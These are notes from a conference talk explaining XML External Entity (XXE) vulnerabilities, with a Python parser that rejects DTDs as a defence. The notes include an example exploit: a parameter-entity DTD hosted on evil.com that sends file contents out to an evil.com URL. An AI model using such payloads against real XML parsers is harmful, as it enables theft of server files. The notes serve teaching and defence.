XML eXternal Entities

Notes from the BSidesPDX talk by @brimy, which gives a great introduction to how XXE vulnerabilities operate. Video posted

Added to the OWASP Top 10 in 2017.

Entities

HTML entities are the familiar starting point: an escape such as &amp; is rendered as a literal &. The &name; syntax is what triggers entity expansion.

XML also lets you declare your own entities in the DTD and reference them by name:

<!ENTITY xml "Extensible Markup Language">

&xml;

(A general entity like this is referenced as &xml; in the document body; the %name; form is for parameter entities, which are declared with <!ENTITY % ...> and can only be referenced inside the DTD itself.)

External Entities

<!ENTITY chapter1 SYSTEM "chapter1.txt">

When the parser expands &chapter1;, it fetches the contents of chapter1.txt and substitutes them into the document.

If an attacker controls the XML, this lets them declare entities pointing at local files or URLs, and the parser will read that data and return it in its output.

Example Exploit

The attacker hosts a DTD at evil.com/evil.dtd. Once the vulnerable parser loads it, the contents of the file entity are sent out of the target in a request to http://evil.com/evil.html?payload=...:

<!ENTITY % all
    "<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>"
>
%all;

Threat Model Questions to Ask

Does your server allow DTDs? .NET is one of the primary offenders: .NET below 4.5.2 is vulnerable with its default settings.

  • Do you allow external entities? (You shouldn't.)
  • Do you validate untrusted input? (You always should.)

DO: update your parsers, disable DTDs and external entities, validate input, and if you must resolve URLs set an explicit policy for which ones are allowed.
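To make the "disable DTDs and validate input" advice concrete, here is an added example (not from the talk) using only Python's standard-library expat bindings: the parser refuses any DOCTYPE or entity declaration before a single entity can be resolved. The sample documents are constructed for the demo.

```python
import xml.parsers.expat as expat
from xml.etree.ElementTree import Element, TreeBuilder


class DtdNotAllowed(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


def parse_untrusted_xml(data: bytes) -> Element:
    """Parse XML from an untrusted source with DTD processing refused.

    Aborts as soon as a DOCTYPE or <!ENTITY ...> declaration is seen, so no
    entity (internal, SYSTEM or PUBLIC) is ever declared, let alone resolved.
    Namespaces are not expanded; extend the handlers if you need them.
    """
    builder = TreeBuilder()
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} not permitted in untrusted input")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        raise DtdNotAllowed(f"{kind} entity {name!r} declaration refused")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    # Never fetch external parameter entities (the remote evil.dtd pattern).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    # No ExternalEntityRefHandler is installed, so external general entities
    # would not be retrieved even if a declaration somehow got through.
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()


def is_accepted(data: bytes) -> bool:
    """True if the document parses, False if it was refused for carrying a DTD."""
    try:
        parse_untrusted_xml(data)
        return True
    except DtdNotAllowed:
        return False


# Constructed sample inputs (not from the talk).
BENIGN = b"<order><item>widget</item></order>"
WITH_DTD = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE order [<!ENTITY chapter1 SYSTEM "chapter1.txt">]>'
            b"<order>&chapter1;</order>")
```

The same check rejects a document that only points at a remote DTD, since the DOCTYPE handler fires before any external fetch could happen.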